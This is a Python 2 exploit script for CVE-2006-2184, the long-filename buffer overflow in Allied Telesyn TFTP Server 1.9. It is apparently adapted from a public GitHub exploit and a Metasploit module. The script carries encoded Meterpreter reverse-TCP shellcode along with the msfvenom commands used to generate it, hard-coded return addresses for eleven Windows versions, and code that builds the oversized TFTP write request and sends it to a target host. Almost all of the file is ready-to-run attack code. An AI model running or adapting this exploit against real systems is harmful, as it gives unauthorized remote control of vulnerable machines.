Modified version of the CVE-2006-2184 Python script found here: https://github.com/Re4son/AT-TFTP_Long_Filename/blob/master/attftp_long_filename.py
#!/usr/bin/env python
import sys
import struct
import socket as so
# Console banner: names the CVE, credits the original author and states where
# the per-target return addresses used by set_return() come from.
print '#######################################################################'
print '# CVE-2006-2184 - Allied Telesyn TFTP v1.9 Long Filename Overflow #'
print '# This is a modified version of Re4son\'s code #'
print '# (https://github.com/Re4son/AT-TFTP_Long_Filename) #'
print '# The return addresses are ported from metasploit module #'
print '# exploit/windows/tftp/attftp_long_filename #'
print '#######################################################################\n'
# Shellcode - Staged Meterpreter Reverse TCP (NONX)
# Badchars: \x00
# StackAdjustment: -3500
# Payload size: 210 bytes
# Generation instructions:
# printf '\x81\xec\xac\x0d\x00\x00' > payload # sub exp, 0xdac / nop / nop
# msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=10.11.0.95 LPORT=443 \
# -a x86 --platform Windows -e generic/none -f raw >> payload
# cat payload | msfvenom -p - -e x86/shikata_ga_nai -b "\x00" -f c
# Encoded payload bytes produced by the msfvenom pipeline described in the
# comments above.  The listener address and port are fixed inside these bytes
# at generation time; the LHOST command-line argument does not alter them.
# The encoder pass is there to eliminate 0x00, the only bad character listed
# above -- the surrounding request fields are NUL-terminated (see the tail
# built in build_payload), so a stray NUL would cut the request short.
SHELLCODE = (
"\xdb\xd6\xd9\x74\x24\xf4\xbe\xcf\xa5\x10\xfb\x5f\x29\xc9\xb1\x2e"
"\x83\xc7\x04\x31\x77\x16\x03\x77\x16\xe2\x3a\x24\xfc\x57\xc9\x27"
"\xfd\x5b\xbb\xcc\xba\x4b\xc2\xec\xba\x73\x54\x22\x9e\x07\xe9\x78"
"\xab\x64\x2c\xf9\xaa\x7b\xc5\xae\x8c\x82\x33\xdb\xf9\x1e\xc2\x32"
"\x30\xdf\x5d\x66\xf2\x15\x50\x76\x37\x2d\xaa\x0d\x41\x6d\x4c\xd7"
"\x67\x07\x73\x6c\xf3\xa7\x57\x72\xea\x5e\x1c\x68\xb5\x15\x6d\x8d"
"\x44\xc3\x72\x81\xdf\x9a\x18\xfd\xc3\xfd\x1f\x1d\xca\x26\xbb\x55"
"\x6e\xe9\xc8\x2a\x7d\x82\xbe\xb6\xd0\x1f\x56\xcf\x74\x46\xf5\xa9"
"\xe0\xb5\xcb\x5d\x86\xca\x19\xc1\x3c\x4b\xe4\x8f\xdc\x6c\xc0\xe5"
"\x4e\xc0\xbf\x56\x32\xb5\x7c\x0a\x3d\xde\xe4\x2d\xd2\x29\xea\x7a"
"\x7e\x4c\x53\x63\x5f\x6f\x75\x0a\xd9\x38\x16\x2c\xcf\xae\x80\xd8"
"\xfb\xd0\x0f\xbb\x93\xd1\x14\x25\x37\x5b\x89\xc0\xa7\x08\x1a\x73"
"\x71\xf9\xa1\x84\x57\x56\x1d\x76\x08\x04\x0a\xd4\xce\x13\x74\xe2"
"\xf1\x82"
)
def set_return(target):
    """Return the packed 32-bit return address for the selected target.

    target is the target id as given on the command line, a string in
    '1'..'11'.  Every address is a hard-coded constant packed as a
    little-endian unsigned 32-bit value; per the banner they were ported
    from the metasploit module for this CVE.  Any other value prints an
    error and terminates the process through sys.exit(-1) -- no exception
    reaches the caller.
    """
    if target == '1':
        print '[+] Selecting target: Windows NT SP4 English'
        retaddr = struct.pack('<L', 0x702ea6f7)
    elif target == '2':
        print '[+] Selecting target: Windows 2000 SP0 English'
        retaddr = struct.pack('<L', 0x750362c3)
    elif target == '3':
        print '[+] Selecting target: Windows 2000 SP1 English'
        retaddr = struct.pack('<L', 0x75031d85)
    elif target == '4':
        print '[+] Selecting target: Windows 2000 SP2 English'
        retaddr = struct.pack('<L', 0x7503431b)
    elif target == '5':
        print '[+] Selecting target: Windows 2000 SP3 English'
        retaddr = struct.pack('<L', 0x74fe1c5a)
    elif target == '6':
        print '[+] Selecting target: Windows 2000 SP4 English'
        retaddr = struct.pack('<L', 0x75031dce)
    elif target == '7':
        print '[+] Selecting target: Windows XP SP0/1 English'
        retaddr = struct.pack('<L', 0x71ab7bfb)
    elif target == '8':
        print '[+] Selecting target: Windows XP SP2 English'
        retaddr = struct.pack('<L', 0x71ab9372)
    elif target == '9':
        print '[+] Selecting target: Windows XP SP3 English'
        retaddr = struct.pack('<L', 0x7e429353) # ret by c0re
    elif target == '10':
        print '[+] Selecting target: Windows Server 2003'
        retaddr = struct.pack('<L', 0x7c86fed3) # ret donated by securityxxxpert
    elif target == '11':
        print '[+] Selecting target: Windows Server 2003 SP2'
        retaddr = struct.pack('<L', 0x7c86a01b) # ret donated by Polar Bear
    else:
        # Unknown id: report and stop here rather than return an unbound name.
        print '[-] Target not supported or invalid target specified!'
        sys.exit(-1)
    return retaddr
def build_payload(shellcode, retaddr, lhost):
    """Assemble the malformed TFTP write request (WRQ) datagram as a str.

    Layout, in order: the two-byte TFTP opcode "\\x00\\x02" (WRQ), a NOP
    sled of 25 - len(lhost) bytes, the shellcode, the packed return address,
    an "add esp, 0x28 / ret" stub, and the NUL-terminated mode string
    "netascii".  Everything between the opcode and the first NUL is what a
    TFTP server reads as the filename, so the filename field of this request
    is several times longer than any legitimate one -- an oversized WRQ/RRQ
    filename from an unexpected source is the observable signature of this
    attack on the wire.

    Only len(lhost) is used here; the LHOST string itself never enters the
    packet.  The listener address is fixed inside SHELLCODE at generation
    time (see the comments above it).
    """
    # Let's build the payload
    print '[+] Constructing payload.'
    # Create NOP sled to bring NOPs & LHOST to 25 bytes
    nops = "\x90" * (25 - len(lhost))
    tail = "" # tail from metasploit
    tail += "\x83\xc4\x28\xc3" # add esp, 0x28 / ret
    tail += "\x00netascii\x00" # Finish as expected by the AT TFTP server
    payload = "\x00\x02" + nops + shellcode + retaddr + tail
    return payload
def send_packet(payload, rhost, rport):
    """Send payload to (rhost, rport) as one UDP datagram.

    Fire-and-forget: nothing is read back, so the caller gets no indication
    of whether the service accepted, rejected or crashed on the request.
    If sendto() raises OSError the process exits with status -1.
    """
    # Declare a UDP socket
    s = so.socket(so.AF_INET, so.SOCK_DGRAM)
    print "[+] Delivering package..."
    try:
        s.sendto(payload, (rhost, rport))
    except OSError:
        # NOTE(review): this file uses Python 2 print statements; on Python 2
        # socket failures raise socket.error, which is not an OSError
        # subclass there, so this handler may never fire -- confirm on the
        # interpreter in use.  UDP has no connection, so a failure here is
        # typically a resolution or routing error, not a refused connection.
        print "[-] Could not connect to " + rhost + ":" + str(rport) + "!"
        sys.exit(-1)
    # The socket is never closed explicitly; it is released when `s` is
    # garbage-collected after the function returns.
    print "[+] Package delivered!"
def main():
    """Parse command-line arguments and send a single exploit datagram.

    Positional arguments: RHOST, RPORT, LHOST and an optional TARGET id
    (defaults to '10').  A missing required argument prints the usage text
    and exits with status -1.  A non-numeric RPORT raises ValueError from
    int(), which is not handled here.
    """
    try:
        RHOST = sys.argv[1] # Target IP address as command line argument
        RPORT = int(sys.argv[2]) # Target Port as command line argument
        # Only len(LHOST) affects the packet (see build_payload); the
        # listener address itself is fixed inside SHELLCODE.
        LHOST = sys.argv[3] # Attackers IP address
        TARGET = sys.argv[4] if len(sys.argv) > 4 else '10' # The target system
    except IndexError:
        print '[-] Usage: %s <RHOST> <RPORT> <LHOST> [<TARGET>]' % sys.argv[0]
        print '[-] Example: %s 10.11.1.226 69 10.11.0.95' % sys.argv[0]
        print '[-]'
        print '[-] Available Targets (* = Default):'
        print '[-] 1 - Windows NT SP4 English'
        print '[-] 2 - Windows 2000 SP0 English'
        print '[-] 3 - Windows 2000 SP1 English'
        print '[-] 4 - Windows 2000 SP2 English'
        print '[-] 5 - Windows 2000 SP3 English'
        print '[-] 6 - Windows 2000 SP4 English'
        print '[-] 7 - Windows XP SP0/1 English'
        print '[-] 8 - Windows XP SP2 English'
        print '[-] 9 - Windows XP SP3 English'
        print '[-] * 10 - Windows Server 2003'
        print '[-] 11 - Windows Server 2003 SP2'
        sys.exit(-1)
    # set_return() exits the process itself on an unknown TARGET id.
    RETADDR = set_return(TARGET)
    PAYLOAD = build_payload(SHELLCODE, RETADDR, LHOST)
    send_packet(PAYLOAD, RHOST, RPORT)
# Script entry point; importing the module runs only the banner prints above.
if __name__ == '__main__':
    main()